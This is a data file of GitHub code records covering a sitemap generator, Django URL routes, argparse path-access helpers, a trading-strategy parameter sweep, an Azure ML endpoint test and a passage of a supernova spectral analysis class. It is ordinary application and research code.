+{"seq_id": "73700852887", "text": "#!/usr/bin/env python\n\nimport ConfigParser\nimport MySQLdb\nimport os\nimport xml.etree.ElementTree as ET\n\nfrom MySQLdb.cursors import DictCursor\n\n# Read configuration\nconfig = ConfigParser.ConfigParser()\nconfig.read(os.path.join(os.path.abspath(os.path.dirname(__file__)),\n '..', 'config', 'config.ini'))\n\nhost = config.get('prod', 'host')\ndbname = config.get('prod', 'dbname')\nusername = config.get('prod', 'username')\npassword = config.get('prod', 'password')\n\n# Connect to DB\nconnection = MySQLdb.connect(host=host, user=username,\n passwd=password, db=dbname,\n cursorclass=DictCursor)\ncursor = connection.cursor()\n\n# Get last update from home page\ncursor.execute(\"SELECT MAX(pubdate) AS last_pub FROM articles WHERE pubdate < NOW()\")\nlast_pubdate = cursor.fetchone()\n\n# Create sitemap xml root element\nsitemap = ET.Element('urlset')\nsitemap.set('xmlns', 'http://www.sitemaps.org/schemas/sitemap/0.9')\n\n# Home page is frequently changed\nurl_element = ET.SubElement(sitemap, 'url')\nloc = ET.SubElement(url_element, 'loc')\nloc.text = \"http://www.melmelboo.fr\"\nlastmod = ET.SubElement(url_element, 'lastmod')\nlastmod.text = last_pubdate[\"last_pub\"].strftime(\"%Y-%m-%d\")\nchangefreq = ET.SubElement(url_element, 'changefreq')\nchangefreq.text = 'weekly'\npriority = ET.SubElement(url_element, 'priority')\npriority.text = \"1.0\"\n\n# List all articles and add url to sitemap\ncursor.execute(\"SELECT id, url, pubdate FROM articles WHERE pubdate < NOW() ORDER BY id DESC\")\nmy_articles = cursor.fetchall()\nfor art in my_articles:\n url_element = ET.SubElement(sitemap, 'url')\n loc = ET.SubElement(url_element, 'loc')\n loc.text = \"http://www.melmelboo.fr/art-%s-%d\" % (art['url'], art['id'])\n lastmod = ET.SubElement(url_element, 'lastmod')\n lastmod.text = art['pubdate'].strftime(\"%Y-%m-%d\")\n changefreq = ET.SubElement(url_element, 'changefreq')\n changefreq.text = 'never'\n priority = ET.SubElement(url_element, 'priority')\n priority.text = \"0.8\"\n\n# List all categories and add url to sitemap\ncursor.execute(\"SELECT id, slug FROM category WHERE type=0 ORDER BY id DESC\")\nmy_categories = cursor.fetchall()\nfor cat in my_categories:\n cursor.execute(\"SELECT MAX(pubdate) AS pubdate FROM articles WHERE cat = %s AND pubdate < NOW()\", cat['id'])\n art = cursor.fetchone()\n if art['pubdate'] is None:\n continue\n url_element = ET.SubElement(sitemap, 'url')\n loc = ET.SubElement(url_element, 'loc')\n loc.text = \"http://www.melmelboo.fr/cat-%s-%d\" % (cat['slug'], cat['id'])\n lastmod = ET.SubElement(url_element, 'lastmod')\n lastmod.text = art['pubdate'].strftime(\"%Y-%m-%d\")\n changefreq = ET.SubElement(url_element, 'changefreq')\n changefreq.text = 'monthly'\n priority = ET.SubElement(url_element, 'priority')\n priority.text = \"0.5\"\n\ntree = ET.ElementTree(sitemap)\ntree.write('sitemap.xml', encoding=\"UTF-8\")\n", "repo_name": "blatinier/VoguerSurLaVague", "sub_path": "scripts/sitemap_generator.py", "file_name": "sitemap_generator.py", "file_ext": "py", "file_size_in_byte": 2944, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "ConfigParser.ConfigParser", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.dirname", 
"line_number": 12, "usage_type": "call"}, {"api_name": "MySQLdb.connect", "line_number": 21, "usage_type": "call"}, {"api_name": "MySQLdb.cursors.DictCursor", "line_number": 23, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 31, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 31, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 35, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 35, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 36, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 36, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 38, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 38, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 40, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 40, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 42, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 42, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 49, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 49, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 50, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 50, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 52, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 52, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 54, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 54, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 56, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 56, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 67, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 67, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 68, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 68, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 70, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 70, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 72, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 72, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 74, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 74, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.ElementTree", "line_number": 77, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 77, "usage_type": "name"}]}
+{"seq_id": "15559676131", "text": "from django.conf.urls.static import static\nfrom django.urls import path\n\nfrom apps.recipes.views import (\n GetAllRecipesView,\n DetailedRecipeView,\n CreateRecipeView,\n SaveRecipeView,\n)\nfrom core import settings\n\napp_name = 'recipes'\n\nurlpatterns = [\n path('all/', GetAllRecipesView.as_view(), name='recipe-list'),\n path('item//', DetailedRecipeView.as_view(), name='recipe-detail'),\n path('create/', CreateRecipeView.as_view(), name='recipe-create'),\n path('item/download//', SaveRecipeView.as_view(), name='recipe-download'),\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n", "repo_name": "nika-jashi/Recipe-Api", "sub_path": "apps/recipes/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 634, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "apps.recipes.views.GetAllRecipesView.as_view", "line_number": 15, "usage_type": "call"}, {"api_name": "apps.recipes.views.GetAllRecipesView", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "apps.recipes.views.DetailedRecipeView.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "apps.recipes.views.DetailedRecipeView", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "apps.recipes.views.CreateRecipeView.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "apps.recipes.views.CreateRecipeView", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "apps.recipes.views.SaveRecipeView.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "apps.recipes.views.SaveRecipeView", "line_number": 18, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 20, "usage_type": "call"}, {"api_name": "core.settings.MEDIA_URL", "line_number": 20, "usage_type": "attribute"}, {"api_name": "core.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "core.settings.MEDIA_ROOT", "line_number": 20, "usage_type": "attribute"}]}
+{"seq_id": "5693520169", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n\n # the BookListView has a different format from the index view because it'll be implemented as a class. It will inherit from an existing generic view function that already does most of what we want this view function to do, rather than writing our own from scratch. For Django class-based views we access an appropriate view function by calling the class method as_view(). This does all the work of creating an instance of the class, and making sure that the right handler methods are called for incoming HTTP requests.\n path('books/', views.BookListView.as_view(), name='books'),\n \n # The generic class-based detail view expects to be passed a parameter named pk. If you're writing your own function view you can use whatever parameter name you like, or indeed pass the information in an unnamed argument.\n path('book/', views.BookDetailView.as_view(), name='book-detail'),\n\n path('authors/', views.AuthorListView.as_view(), name='authors'),\n path('author/', views.AuthorDetailView.as_view(), name='author-detail'),\n path('mybooks/', views.LoanedBooksByUserListView.as_view(), name='my-borrowed'),\n path('book//renew/', views.renew_book_librarian, name='renew-book-librarian'),\n]", "repo_name": "activus-d/MDN-locallibrary-app", "sub_path": "catalog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1340, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "72195593367", "text": "import argparse\nimport enum\nimport functools\nimport operator\nimport os\nimport pathlib\n\n\nclass ChoiceMapping(argparse.Action):\n \"\"\"Argparse Action to interpret the `choices` argument as a\n mapping of user-specified choices values to the resulting option\n values.\n\n \"\"\"\n def __init__(self, *args, choices, **kwargs):\n super().__init__(*args, choices=choices.keys(), **kwargs)\n self.mapping = choices\n\n def __call__(self, parser, namespace, value, option_string=None):\n setattr(namespace, self.dest, self.mapping[value])\n\n\ndef access_parent(path):\n access_target = path\n\n # Path.exists() calls stat() which can raise PermissionError (prematurely)\n while not os.path.exists(access_target) and access_target.name != '':\n access_target = access_target.parent\n\n return access_target\n\n\nclass PathAccess:\n \"\"\"Argparse type ensuring filesystem access to given path argument.\n\n An instance of pathlib.Path is returned.\n\n \"\"\"\n class Access(enum.IntFlag):\n\n r = os.R_OK\n w = os.W_OK\n\n @property\n def mode(self):\n #\n # note: enum has various internal means of determining contents of\n # a composite flag until proper instance iteration lands in 3.11 or\n # so.\n #\n # rather than worrying about that, here we determine contained names\n # manually. in 3.11 should be even simpler.\n #\n return ''.join(member.name for member in self.__class__ if member in self)\n\n def ok(self, path):\n return os.access(path, self)\n\n class PathAccessError(argparse.ArgumentTypeError):\n \"\"\"Subclass of ArgumentTypeError raised when path permissions\n do not match specified mode.\n\n \"\"\"\n\n def __init__(self, mode, parents=False):\n if isinstance(mode, str):\n self.access = functools.reduce(operator.or_, (self.Access[part] for part in mode))\n elif isinstance(mode, int):\n self.access = self.Access(mode)\n elif isinstance(mode, self.Access):\n self.access = mode\n else:\n raise TypeError('expected access mode of type str, int or Access '\n 'not ' + mode.__class__.__name__)\n\n self.parents = parents\n\n def __call__(self, value):\n path = pathlib.Path(value)\n\n access_target = access_parent(path) if self.parents else path\n\n if not self.access.ok(access_target):\n raise self.PathAccessError(\"failed to access path with mode \"\n f\"{self.access.mode}: {path}\")\n\n return path\n\n\nclass PathTypeError(argparse.ArgumentTypeError):\n \"\"\"Subclass of ArgumentTypeError raised for path of incorrect type.\"\"\"\n\n\nclass FileAccess(PathAccess):\n\n PathTypeError = PathTypeError\n\n def __call__(self, value):\n path = super().__call__(value)\n\n if self.parents and not path.exists():\n if not access_parent(path).is_dir():\n raise self.PathTypeError(f\"path inaccessible: {path}\")\n elif not path.is_file():\n raise self.PathTypeError(f\"path must be file: {path}\")\n\n return path\n\n\nclass DirAccess(PathAccess):\n\n PathTypeError = PathTypeError\n\n def __call__(self, value):\n path = super().__call__(value)\n\n if self.parents and not path.exists():\n if not access_parent(path).is_dir():\n raise self.PathTypeError(f\"path inaccessible: {path}\")\n elif not path.is_dir():\n raise self.PathTypeError(f\"path must be directory: {path}\")\n\n return path\n", "repo_name": "internet-equity/fate", "sub_path": "src/fate/util/argument.py", "file_name": "argument.py", "file_ext": "py", "file_size_in_byte": 3636, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": 
"argparse.Action", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "enum.IntFlag", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.R_OK", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.W_OK", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.access", "line_number": 57, "usage_type": "call"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 59, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 67, "usage_type": "call"}, {"api_name": "operator.or_", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 79, "usage_type": "call"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 90, "usage_type": "attribute"}]}
+{"seq_id": "2612445285", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nalpaca_marker_data --> param_sweep \n (do only once) | |\n | uses | \n | these | \n |classes|\n V V\n heuristics ---> moneyManager\n \n \n \n \n\"\"\"\n\n\n#This script will take my custom built class and load data into it\n#Similar to data_loader, but instead of primarily being for visualization, here we do parameter sweeps\n#Some general sweeps we will do:\n# -different long/recent averages combinations\n# -threshold values for buying/selling\n# -stock markers\n\n#Anything more in depth than the above (such as approaches with regards to variable-sized stock buys)\n#should really be handled by the data_loader, which allows for more visualization\n\n\n\n\nimport config\n \nimport alpaca_trade_api as tradeapi\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\n\nfrom heuristics import StockPredictor\nfrom moneyManager import BankAccount\n\nimport os, datetime\nimport time\n\n#~~~Load in the data before sweep loops~~~\n# f = open('test_data/stockdata_7_27.pckl', 'rb')\nf = open('test_data/stockdata_9_19.pckl', 'rb')\nfullData = pickle.load(f)\nf.close()\n\n\n#~~~Create lists by which the sweeps will occur~~~\n##Sweep 1: --> go low on thesholds and average time\n#sweepList_recT = [10/460, 50/460, 100/460, 300/460]\n#sweepList_avgT = [int(1), int(2), int(4), int(7)]\n#sweepList_thresh = [0.05, 0.1, 0.25, 0.5, 1]\n\n##Sweep 2:\n#numMin = 331.246\n#temp = list(range(10))\n#sweepList_recT = [(i*8 + 5)/numMin for i in temp]\n#sweepList_avgT = [0.4, 0.6, 0.8, 1.0, 1.2, 1.4, 1.6, 1.8, 2.0, 2.2, 2.4, 2.6] \n#sweepList_thresh = [0.02, 0.04, 0.5, 0.06, 0.08, 0.1]\n\n#Sweep 3:\nnumMin = 331.246\ntemp = list(range(10))\n#sweepList_recT = [(i*6 + 5)/numMin for i in temp]\nsweepList_recT = [0.08,0.10,0.12,0.14,0.16,0.18]\n#sweepList_avgT = [2, 2.5, 3, 3.5, 4, 4.5, 5] \nsweepList_avgT = [2] \n#sweepList_thresh = [0.01, 0.015, 0.02]\nsweepList_thresh = [0.05,0.01,0.015,0.02]\n\nsweepList_deltaThresh = [0,0.1,0.25,0.5,0.75,1,1.25,1.5,1.75,2] #Define as a portion of the nominal threshold\n\n\nparamNum = len(sweepList_avgT)*len(sweepList_recT)*len(sweepList_thresh)*len(sweepList_deltaThresh)\n\n\nprint('We will be running through ' + str(paramNum) + ' parameters')\ntime.sleep(1)\n\n\n\n#~~~INITIALIZE STOCK PREDICTOR CLASS ~~~\nmySP = StockPredictor('invmean', 'data')\nmySP.data_loader(fullData['SPY'][:,np.r_[0:2, -1]])\n# mySP.data_loader(fullData['TSLA'][:,np.r_[0:2, -1]])\n#mySP.data_loader(fullData['AAPL'][:,np.r_[0:2, -1]])\n\n\n#~~~INITIALIZE BANK MANAGMENT CLASS ~~~\nrefBank = BankAccount(cashPool = 10e3, tradStrat = 'simple_heur', \\\n heuristic = mySP)\n \n\n\n#~~~Param for loop sweep time ~~~\n#evertime we change parameters, reset sweet param variables for the class, and rerun the predict function\nparamList = [] #append calculated parameters here\ndataList = [] #store heursitic results here (big list here)\niTrack = 0\nfor curr_recT in sweepList_recT:\n for curr_avgT in sweepList_avgT:\n for curr_thresh in sweepList_thresh:\n for curr_delta in sweepList_deltaThresh:\n iTrack += 1\n print('Currently on sweep...' 
+ str(iTrack))\n \n #reject this combination of parameters if avgT is smaller than recT...\n if curr_avgT <= curr_recT:\n continue\n \n mySP.sweepParam_avgT = curr_avgT\n mySP.sweepParam_recT = curr_recT\n mySP.sweepParam_thresh = curr_thresh\n mySP.sweepParam_deltaThresh = curr_delta \n \n #rerun predictors for heuristics/money manager objects\n mySP.predictor()\n simpheurT, simpheurData, debugArr, cashArr, stockArr = refBank.timeLapse()\n \n #append to the tracking lists\n paramList.append((curr_avgT, curr_recT, curr_thresh, curr_delta))\n dataList.append((simpheurT, simpheurData))\n \n \n \n#~~~Sort the last values of the hueristic outputs, print the best 5 param combos~~~\ntopNum = 5\nlastValList = [i[1][-1] for i in dataList]\nsortedVals = sorted(lastValList)\ntopNList = []\n\nfor i in range(topNum):\n topIdx = lastValList.index(sortedVals[-1-i])\n topNList.append(topIdx)\n \n#Print the params\nfor i, val in enumerate(topNList):\n print('Rank ' + str(i) + ': ')\n print('Average Time: ' + str(paramList[val][0]))\n print('Recent Time: ' + str(paramList[val][1]))\n print('Threshold: ' + str(paramList[val][2]))\n print('Threshold Delta: ' + str(paramList[val][3]))\n print()\n \n\n \n \n\n\n#~~~Plot the loop results~~~\nplt.figure(1)\nfor i in range(paramNum):\n currData = dataList[i]\n plt.plot(currData[0], currData[1])\n plt.grid()\n plt.title('Parameter Sweep Comparison Graph')\n \n#plot the top N results with labels \nlegendList = [] \nplt.figure(2)\nfor i, val in enumerate(topNList):\n currData = dataList[val]\n plt.plot(currData[0], currData[1])\n \n legendStr = 'Rank=' + str(i) + ', avgT=' + str(paramList[val][0]) + \\\n ', recT=' + \"{:.2f}\".format(paramList[val][1]) + ', thresh=' + str(paramList[val][2]) + \\\n ', dThresh=' + str(paramList[val][3])\n legendList.append(legendStr)\nplt.grid()\nplt.title('Best ' + str(topNum) + ' Parameter Combos')\nplt.legend(legendList)\n \n \n ", "repo_name": "michaele77/trading_bot", "sub_path": "param_sweep.py", "file_name": "param_sweep.py", "file_ext": "py", "file_size_in_byte": 5619, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pickle.load", "line_number": 48, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 82, "usage_type": "call"}, {"api_name": "heuristics.StockPredictor", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.r_", "line_number": 88, "usage_type": "attribute"}, {"api_name": "moneyManager.BankAccount", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 160, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.grid", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 175, "usage_type": "name"}]}
+{"seq_id": "43327566972", "text": "import requests\nimport json\n\nif __name__ == \"__main__\":\n scoring_uri='http://202b7995-5a51-4923-9d2e-c4114e7bd28d.southeastasia.azurecontainer.io/score'\n headers = {'Content-Type':'application/json'}\n test_data=json.dumps({'data_field':[1,123,123,41,3,123,123,4,1,5]})\n response = requests.post(scoring_uri, data=test_data, headers=headers)\n print(response.status_code)\n print(response.elapsed)\n print(response.json())\n", "repo_name": "admin822/Azure_Machine_Learning_How_to_Use", "sub_path": "test_deployed_endpoint.py", "file_name": "test_deployed_endpoint.py", "file_ext": "py", "file_size_in_byte": 440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "json.dumps", "line_number": 7, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 8, "usage_type": "call"}]}
+{"seq_id": "5088237889", "text": "from astropy import table\nfrom hashlib import md5\nfrom idrtools import Dataset, math\nfrom matplotlib import pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom matplotlib.gridspec import GridSpec\nfrom scipy.optimize import minimize\nfrom sklearn.manifold import Isomap\nimport extinction\nimport numpy as np\nimport os\nimport pickle\nimport sys\nfrom tqdm.autonotebook import tqdm\n\nfrom settings import default_settings\nfrom manifold_gp import ManifoldGaussianProcess\nimport utils\nimport specind\n\n\nclass TwinsEmbeddingException(Exception):\n pass\n\n\nclass TwinsEmbeddingAnalysis:\n def __init__(self, **kwargs):\n \"\"\"Load the dataset and setup the analysis\"\"\"\n\n # Update the default settings with any arguments that came in from kwargs.\n self.settings = dict(default_settings, **kwargs)\n\n # Set the default matplotlib figure size from the settings.\n import matplotlib as mpl\n for key, value in self.settings['matplotlib_settings'].items():\n mpl.rcParams[key] = value\n\n def run_analysis(self):\n \"\"\"Run the full analysis\"\"\"\n self.load_dataset()\n\n self.print_verbose(\"Estimating the spectra at maximum light...\")\n self.model_differential_evolution()\n\n if self.settings['test_no_interpolation']:\n # As a test, use the spectrum near maximum light directly rather than doing\n # interpolation.\n self.print_verbose(\"TEST: Using the spectra closest to maximum light \"\n \"directly, without the time evolution model...\")\n self.maximum_flux = self.flux[self.center_mask]\n self.maximum_fluxerr = self.fluxerr[self.center_mask]\n\n self.print_verbose(\"Reading between the lines...\")\n self.read_between_the_lines()\n\n self.print_verbose(\"Building masks...\")\n self.build_masks()\n\n self.print_verbose(\"Generating the manifold learning embedding...\")\n self.embedding = self.generate_embedding()\n\n self.print_verbose(\"Loading other indicators of diversity...\")\n self.load_indicators()\n\n self.print_verbose(\"Fitting RBTL Twins Manifold GP...\")\n self.residuals_rbtl_gp = self.fit_gp_magnitude_residuals()\n\n self.print_verbose(\"Fitting SALT2 Twins Manifold GP...\")\n self.residuals_salt_gp = self.fit_gp_magnitude_residuals('salt_raw')\n\n self.print_verbose(\"Calculating SALT2 magnitude residuals...\")\n self.residuals_salt = self.fit_salt_magnitude_residuals()\n\n self.print_verbose(\"Done!\")\n\n def load_dataset(self):\n \"\"\"Load the dataset\"\"\"\n self.print_verbose(\"Loading dataset...\")\n self.print_verbose(\" IDR: %s\" % self.settings['idr'])\n self.print_verbose(\n \" Phase range: [%.1f, %.1f] days\"\n % (-self.settings['phase_range'], self.settings['phase_range'])\n )\n self.print_verbose(\" Bin velocity: %.1f\" % self.settings['bin_velocity'])\n\n self.dataset = Dataset.from_idr(\n os.path.join(self.settings['idr_directory'], self.settings['idr']),\n load_both_headers=True\n )\n\n # Do/load all of the SALT2 fits for this dataset\n self.dataset.load_salt_fits()\n\n all_raw_spec = []\n center_mask = []\n\n self.attrition_enough_spectra = 0\n self.attrition_total_spectra = 0\n self.attrition_salt_daymax = 0\n self.attrition_range = 0\n self.attrition_explicit = 0\n self.attrition_usable = 0\n\n for supernova in tqdm(self.dataset.targets):\n # Require at least 5 spectra\n if len(supernova.spectra) < 5:\n self.print_verbose(\n \"Cutting %s, not enough spectra to guarantee a \"\n \"good LC fit\" % supernova,\n minimum_verbosity=2,\n )\n continue\n self.attrition_enough_spectra += 1\n self.attrition_total_spectra 
+= len(supernova.spectra)\n\n # Require t0 measured to better than 1 day uncertainty.\n daymax_err = supernova.salt_fit['t0_err']\n if daymax_err > 1.0:\n self.print_verbose(\n \"Cutting %s, day max err %.2f too high\" % (supernova, daymax_err),\n minimum_verbosity=2,\n )\n continue\n self.attrition_salt_daymax += 1\n\n # Restrict ourselves to near maximum light.\n range_spectra = supernova.get_spectra_in_range(\n -self.settings['phase_range'], self.settings['phase_range']\n )\n if len(range_spectra) > 0:\n self.attrition_range += 1\n\n used_phases = []\n for spectrum in range_spectra:\n if self._check_spectrum(spectrum):\n all_raw_spec.append(spectrum)\n used_phases.append(spectrum.phase)\n else:\n spectrum.usable = False\n\n used_phases = np.array(used_phases)\n if len(used_phases) > 0:\n # Figure out which spectrum was closest to the center of the\n # bin.\n self.attrition_usable += 1\n target_center_mask = np.zeros(len(used_phases), dtype=bool)\n target_center_mask[np.argmin(np.abs(used_phases))] = True\n center_mask.extend(target_center_mask)\n\n all_flux = []\n all_fluxerr = []\n all_spec = []\n\n for spectrum in all_raw_spec:\n bin_spec = spectrum.bin_by_velocity(\n self.settings['bin_velocity'],\n self.settings['bin_min_wavelength'],\n self.settings['bin_max_wavelength'],\n )\n all_flux.append(bin_spec.flux)\n all_fluxerr.append(bin_spec.fluxerr)\n all_spec.append(bin_spec)\n\n # All binned spectra have the same wavelengths, so save the wavelengths\n # from an arbitrary one of them.\n self.wave = all_spec[0].wave\n\n # Save the rest of the info\n self.flux = np.array(all_flux)\n self.fluxerr = np.array(all_fluxerr)\n self.raw_spectra = np.array(all_raw_spec)\n self.spectra = np.array(all_spec)\n self.center_mask = np.array(center_mask)\n\n # Pull out variables that we use all the time.\n self.helio_redshifts = self.read_meta(\"host.zhelio\")\n self.redshifts = self.read_meta(\"host.zcmb\")\n self.redshift_errs = self.read_meta(\"host.zhelio.err\")\n\n # Build a list of targets and a map from spectra to targets.\n self.targets = np.unique([i.target for i in self.spectra])\n self.target_map = np.array(\n [self.targets.tolist().index(i.target) for i in self.spectra]\n )\n\n # Pull out SALT fit info\n self.salt_fits = table.Table([i.salt_fit for i in self.targets])\n self.salt_x1 = self.salt_fits['x1'].data\n self.salt_colors = self.salt_fits['c'].data\n self.salt_phases = np.array([i.phase for i in self.spectra])\n self.salt_mask = np.array([i.has_valid_salt_fit() for i in self.targets])\n\n # Record which targets should be in the validation set.\n self.train_mask = np.array(\n [i[\"idr.subset\"] != \"validation\" for i in self.targets]\n )\n\n # Build a hash that is unique to the dataset that we are working on.\n hash_info = (\n self.settings['idr']\n + ';' + str(self.settings['phase_range'])\n + ';' + str(self.settings['bin_velocity'])\n + ';' + str(self.settings['bin_min_wavelength'])\n + ';' + str(self.settings['bin_max_wavelength'])\n + ';' + str(self.settings['s2n_cut_min_wavelength'])\n + ';' + str(self.settings['s2n_cut_max_wavelength'])\n + ';' + str(self.settings['s2n_cut_threshold'])\n )\n self.dataset_hash = md5(hash_info.encode(\"ascii\")).hexdigest()\n\n # Load a dictionary that maps IDR names into IAU ones.\n iau_data = np.genfromtxt('./data/iau_name_map.txt', dtype=str)\n self.iau_name_map = {i: j for i, j in iau_data}\n\n def _check_spectrum(self, spectrum):\n \"\"\"Check if a spectrum is valid or not\"\"\"\n spectrum.do_lazyload()\n\n s2n_start = 
spectrum.get_signal_to_noise(\n            self.settings['s2n_cut_min_wavelength'],\n            self.settings['s2n_cut_max_wavelength'],\n        )\n\n        if s2n_start < self.settings['s2n_cut_threshold']:\n            # Signal-to-noise cut. We find that a signal-to-noise of < ~100 in the\n            # U-band leads to an added core dispersion of >0.1 mag in the U-band which\n            # is much higher than expected from statistics. This is unacceptable for the\n            # twins analysis that relies on getting the color right for a single\n            # spectrum.\n            self.print_verbose(\n                \"Cutting %s, start signal-to-noise %.2f \"\n                \"too low.\" % (spectrum, s2n_start),\n                minimum_verbosity=2,\n            )\n            return False\n\n        # We made it!\n        return True\n\n    def read_meta(self, key, center_only=True):\n        \"\"\"Read a key from the meta data of each spectrum/target\n\n        This will first attempt to read the key in the spectrum object's meta\n        data. If it isn't there, then it will try to read from the target\n        instead.\n\n        If center_only is True, then a single value is returned for each\n        target, from the spectrum closest to the center of the range if\n        applicable. Otherwise, the values will be returned for each spectrum in\n        the sample.\n        \"\"\"\n        if key in self.spectra[0].meta:\n            read_spectrum = True\n        elif key in self.spectra[0].target.meta:\n            read_spectrum = False\n        else:\n            raise 